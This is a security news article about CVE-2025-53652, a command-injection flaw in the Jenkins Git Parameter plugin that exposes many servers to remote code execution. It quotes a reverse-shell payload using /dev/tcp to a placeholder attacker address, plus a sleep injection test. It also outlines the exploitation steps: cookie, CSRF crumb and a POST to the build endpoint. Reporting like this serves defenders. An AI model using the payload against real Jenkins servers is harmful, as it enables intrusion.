BURSTA critical security vulnerability affecting thousands of Jenkins servers worldwide has emerged as a significant threat to enterprise infrastructure.
CVE-2025-53652, initially classified as medium severity, affects the widely-used Git Parameter plugin and enables attackers to execute arbitrary commands on vulnerable systems.
The vulnerability stems from insufficient input validation in parameter definitions, allowing malicious actors to inject commands that are later executed directly in shell environments.
The scope of this vulnerability is particularly concerning given Jenkins’ widespread adoption in DevOps environments.
According to internet scanning data, approximately 15,000 Jenkins servers appear to allow unauthenticated access, making remote code execution viable without requiring valid credentials.
This configuration significantly amplifies the potential impact, as attackers can exploit these systems without traditional authentication barriers.
VulnCheck researchers identified the vulnerability’s true severity extends far beyond its initial medium rating.
The security flaw allows attackers to inject arbitrary values in Git parameters, which are subsequently processed by Git commands without proper sanitization.
This creates a direct pathway for command injection attacks, transforming what appeared to be a parameter injection issue into a critical remote code execution vulnerability.
The attack mechanism relies on Git’s versatility as a GTFObin, enabling creative exploitation techniques.
When an attacker provides malicious input such as $(sleep 80) as a branch parameter, the injected command appears in the Git execution chain.
The vulnerable code path processes this input during Git operations, specifically in commands like git rev-parse --resolve-git-dir, where the malicious payload gets executed by the underlying shell.
Technical Exploitation Mechanics
The exploitation process demonstrates the vulnerability’s practical impact through command injection techniques.
When a Jenkins job processes a Git parameter, the system constructs shell commands incorporating user-supplied values without adequate validation.
.webp)
For instance, a malicious parameter value like $(bash -c "bash >&/dev/tcp/attacker_ip/port <&1") can establish reverse shell connections, granting attackers complete system access.
The attack requires three key components: the target build name, a valid session cookie, and a Jenkins-Crumb CSRF token.
Attackers can obtain these prerequisites through simple reconnaissance requests to the Jenkins instance. Once acquired, exploitation proceeds via HTTP POST requests to the /job/[buildName]/build endpoint, embedding the malicious payload within the parameter structure.
Process monitoring reveals that Git operations spawn child processes executing the attacker-supplied commands, confirming successful code execution with jenkins user privileges.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
The post 15,00 Jenkins Servers With Vulnerable Git Parameter Plugin Enables Command Injection appeared first on Cyber Security News.